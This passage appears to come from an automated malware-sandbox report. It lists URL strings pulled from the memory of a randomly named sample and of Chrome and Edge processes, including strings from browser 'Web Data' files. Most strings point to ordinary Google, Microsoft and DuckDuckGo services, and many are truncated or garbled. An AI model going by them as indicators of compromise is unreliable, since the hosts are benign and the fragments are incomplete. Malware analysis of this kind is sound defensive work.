          Source: chrome.exe, 0000000A.00000002.1567103533.00007824030B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapi
          Source: chrome.exe, 0000000A.00000002.1563015930.0000782402844000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
          Source: dZKPE9gotO.exe, 00000000.00000002.2207976235.0000000003EF1000.00000004.00000020.00020000.00000000.sdmp, dZKPE9gotO.exe, 00000000.00000002.2206788011.0000000003B9B000.00000004.00000020.00020000.00000000.sdmp, AIWTJM.0.drString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
          Source: dZKPE9gotO.exe, 00000000.00000002.2207976235.0000000003EF1000.00000004.00000020.00020000.00000000.sdmp, dZKPE9gotO.exe, 00000000.00000002.2206788011.0000000003B9B000.00000004.00000020.00020000.00000000.sdmp, AIWTJM.0.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
          Source: chrome.exe, 0000000A.00000002.1565148777.0000782402C1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
          Source: chrome.exe, 0000000A.00000002.1564722322.0000782402B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.goog
          Source: chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
          Source: chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
          Source: chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
          Source: chrome.exe, 0000000A.00000003.1518214315.000078240360C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
          Source: chrome.exe, 0000000A.00000002.1561375774.00007824024C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
          Source: chrome.exe, 0000000A.00000002.1562165163.0000782402681000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563061355.0000782402878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1567048584.0000782403088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563661455.0000782402988000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
          Source: chrome.exe, 0000000A.00000002.1562165163.0000782402681000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1567048584.0000782403088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563661455.0000782402988000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
          Source: chrome.exe, 0000000A.00000002.1562165163.0000782402681000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1567048584.0000782403088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563661455.0000782402988000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
          Source: chrome.exe, 0000000A.00000002.1565327908.0000782402C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
          Source: chrome.exe, 0000000A.00000002.1565327908.0000782402C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
          Source: chrome.exe, 0000000A.00000002.1565327908.0000782402C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
          Source: chrome.exe, 0000000A.00000002.1561375774.00007824024C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1565327908.0000782402C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
          Source: chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1566326820.0000782402EE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563015930.0000782402844000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
          Source: chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions?ls
          Source: chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
          Source: chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
          Source: chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
          Source: chrome.exe, 0000000A.00000002.1561375774.00007824024C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
          Source: chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563015930.0000782402844000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1567236689.00007824030F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
          Source: chrome.exe, 0000000A.00000002.1564722322.0000782402B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.googom/presentation/J
          Source: chrome.exe, 0000000A.00000003.1487654825.0000782403268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
          Source: chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
          Source: chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
          Source: chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
          Source: chrome.exe, 0000000A.00000002.1561830253.0000782402594000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
          Source: chrome.exe, 0000000A.00000002.1565639371.0000782402D70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564776046.0000782402B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
          Source: chrome.exe, 0000000A.00000002.1564776046.0000782402B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=searchTerms
          Source: chrome.exe, 0000000A.00000002.1563661455.0000782402988000.00000004.00000800.00020000.00000000.sdmp, Web Data.15.dr, VKXB16.0.dr, OPHDT2.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: dZKPE9gotO.exe, 00000000.00000002.2206788011.0000000003B3F000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1565639371.0000782402D70000.00000004.00000800.00020000.00000000.sdmp, Web Data.15.dr, VKXB16.0.dr, OPHDT2.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: chrome.exe, 0000000A.00000002.1565639371.0000782402D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
          Source: dZKPE9gotO.exe, 00000000.00000002.2206788011.0000000003B3F000.00000004.00000020.00020000.00000000.sdmp, Web Data.15.dr, VKXB16.0.dr, OPHDT2.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.dr, HubApps Icons.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.dr, HubApps Icons.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.dr, HubApps Icons.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.dr, HubApps Icons.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.dr, HubApps Icons.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.dr, HubApps Icons.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.dr, HubApps Icons.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.dr, HubApps Icons.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
          Source: chrome.exe, 0000000A.00000003.1521082067.000078240375C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
          Source: chrome.exe, 0000000A.00000003.1521145342.000078240377C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1521082067.000078240375C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/$
          Source: chrome.exe, 0000000A.00000003.1521145342.000078240377C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1521082067.000078240375C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/.
          Source: chrome.exe, 0000000A.00000003.1521145342.000078240377C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1521082067.000078240375C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/1
          Source: chrome.exe, 0000000A.00000003.1467152733.000014100039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1519626664.000014100080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1518214315.000078240360C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1466717994.0000141000390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
          Source: chrome.exe, 0000000A.00000003.1521145342.000078240377C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1521082067.000078240375C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/5
          Source: chrome.exe, 0000000A.00000003.1521145342.000078240377C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1521082067.000078240375C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/8
          Source: chrome.exe, 0000000A.00000003.1521145342.000078240377C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1521082067.000078240375C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/;
          Source: chrome.exe, 0000000A.00000003.1467390436.0000141000684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/gj
          Source: chrome.exe, 0000000A.00000002.1551249243.000014100078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1521145342.000078240377C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1467390436.0000141000684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1521082067.000078240375C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
          Source: chrome.exe, 0000000A.00000003.1467152733.000014100039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1519626664.000014100080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1518214315.000078240360C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1466717994.0000141000390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
          Source: chrome.exe, 0000000A.00000003.1467390436.0000141000684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
          Source: chrome.exe, 0000000A.00000003.1467390436.0000141000684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
          Source: chrome.exe, 0000000A.00000002.1551249243.000014100078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1521145342.000078240377C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1521082067.000078240375C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1468528535.00001410006E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
          Source: chrome.exe, 0000000A.00000003.1518214315.000078240360C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
          Source: chrome.exe, 0000000A.00000003.1467152733.000014100039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1519626664.000014100080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1466717994.0000141000390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
          Source: msedge.exe, 0000000D.00000002.1683914101.00003998025A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
          Source: chrome.exe, 0000000A.00000002.1560753957.00007824023C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/googleapis.com
          Source: chrome.exe, 0000000A.00000002.1562688391.00007824027EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/
          Source: chrome.exe, 0000000A.00000003.1518214315.000078240360C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
          Source: chrome.exe, 0000000A.00000003.1518214315.000078240360C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
          Source: AIWTJM.0.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
          Source: msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
          Source: msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
          Source: msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
          Source: msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
          Source: msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
          Source: msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
          Source: msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
          Source: msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
          Source: msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
          Source: msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
          Source: msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
          Source: msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
